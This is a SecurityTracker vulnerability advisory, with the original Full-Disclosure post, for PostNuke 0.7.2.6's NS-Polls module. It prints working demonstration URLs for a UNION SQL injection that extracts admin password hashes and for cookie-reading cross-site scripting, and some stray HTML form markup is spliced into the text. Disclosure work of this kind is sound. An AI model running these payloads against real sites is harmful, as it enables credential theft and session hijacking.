Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PostNuke NS-Polls Input Validation Hole in 'pn_uid' Permits SQL Injection
|
|
SecurityTracker Alert ID: 1009851
|
|
SecurityTracker URL: http://securitytracker.com/id?1009851
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
|
OSVDB Reference: 5510
, 5509
, 5521
(Links to External Site)
|
Updated: Sep 3 2004
|
Original Entry Date: Apr 19 2004
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 0.7.2.6
|
Description: Several vulnerabilities were reported in PostNuke. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can determine the installation path.
Janek Vind "waraxe" reported that a remote user can supply a specially crafted 'pn_uid' variable to the 'NS-Polls' module to inject
SQL commands. If the target system is running MySQL version 4.0 or higher with UNION functionality enabled, then a remote user
can execute arbitrary SQL commands to be executed by the underlying database. A demonstration exploit URL is provided:
http://localhost/postnuke0726/modules.php?op=mo
dload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0
&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null
,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*
It is also reported that 'order' varilable in the 'modload' function is not properly
filtered to remove HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary
scripting code to be executed by the target user's browser. The code will originate from the site running the PostNuke software
and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including
authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://localhost/postnuke0726/modules.php?op=modload&name
=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s>ppp&thold=99
http://localhost/postnuke0726/modules.php?op=modload&n
ame=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);
It is also reported
that a remote user can request the 'Past_Nuke' module with an 'op' parameter value of 'deleteNotice' to cause the system to display
an error message that discloses the installation path. A demonstration exploit URL is provided:
http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNoti
ce
A remote user can also execute an SQL command to determine the installation path, the report said. A demonstration exploit
URL is provided:
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p</textarea></font></td><
/tr>
<tr><td><font size=-1>
<b>Exploit<br>Strings: </b></font></td>
<td><input name="exploitstring" type=text size=65><br>
<input
name="exploitstring" type=text size=65><br>
<input name="exploitstring" type=text size=65><br>
<input name="exploitstring" type=text
size=65><br>
<input name="exploitstring" type=text size=65><br>
<input name="exploitstring" type=text size=65><br>
<input name="exploitstring"
type=text size=65><br>
</td></tr>
<tr><td><font size=-1>
<b>Exploit<br>Reference<br>URL: </b></font></td>
<td><input name="exploitreference"
type=text size=65><br>
<input name="exploitreference" type=text size=65><br>
<input name="exploitreference" type=text size=65><br>
<input
name="exploitreference" type=text size=65><br>
<input name="exploitreference" type=text size=65><br>
<input name="exploitreference"
type=text size=65><br>
<input name="exploitreference" type=text size=65><br>
</td></tr>
<tr><td><font size=-1>
<b>Exploit<br>Code:</b></font></td>
<td><font
size=-1><textarea name="exploitcode" rows=8 cols=85 wrap>
|
Impact: A remote user can inject SQL commands on the target system. This
A remote user can access the target user's cookies (including
authentication cookies), if any, associated with the site running the PostNuke software, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
A remote user can determine the installation
path.
|
Solution: The vendor has released a fix (as of version .726-3), available at:
http://downloads.postnuke.com/
|
Vendor URL: www.postnuke.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Janek Vind <come2waraxe@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 18 Apr 2004 12:33:22 -0700 (PDT)
From: Janek Vind <come2waraxe@yahoo.com>
Subject: [Full-Disclosure] [waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix]
|
{================================================================================}
{ [waraxe-2004-SA#020]
}
{================================================================================}
{
}
{ [ Multiple vulnerabilities in PostNuke
0.726 Phoenix ] }
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 18. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=20
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PostNuke: The Phoenix Release (0.7.2.6)
PostNuke is an open source, open developement content
management system
(CMS). PostNuke started as a fork from PHPNuke
(http://www.phpnuke.org) and
provides many enhancements and improvements over the
PHP-Nuke system. PostNuke
is still undergoing development but a large number of
core functions are now
stabilising and a complete API for third-party
developers is now in place.
If you would like to help develop this software,
please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server
irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - legacy code
http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice
Fatal error: Call to undefined function:
deletenotice() in
D:\apache_wwwroot\postnuke0726\admin.php on line 87
It seems, that this function - deletenotice() - is
removed in new versions, but reference still exists.
Btw, anyone without any authentication can provoke
this error, not only admins.
A2 - path disclosure through sql injection
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&
pollID=2&mode=thread&order=0&thold=p
Fatal error: Call to a member function on a non-object
in
D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php
on line 454
This is sql injection bug through variable named
"thold", but here we use it for path disclosure.
B. Cross-site scripting aka XSS:
Exploiting XSS in PostNuke is difficult task, because
PostNuke will filter out most of the "useful"
tags, like <script>. But anyway, there exists XSS bugs
and they can be exploited, using some
custom technics (therefore loosing crossbrowser
compatibility of the sploit).
B1 - XSS through unsanitaized variable "$order"
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&
pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>p
pp&thold=99
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&
pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);
C. Sql injection:
C1 - critical sql injection in NS-Polls
This is devastating case of the sql injection, because
it can be used to pull out from database
ANY data, attacker needs.
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&
pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,p
n_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHER
E%20pn_uid=2/*
... and we will see admin's username, email and
password's md5 hash in plaintext ;)
Remark - this sploit needs mysql version >=4.x with
UNION functionality enabled!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at
http://bees.tk ! "Boom!!" ;)
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ]
------------------------------------
__________________________________
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
http://photos.yahoo.com/ph/print_splash
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
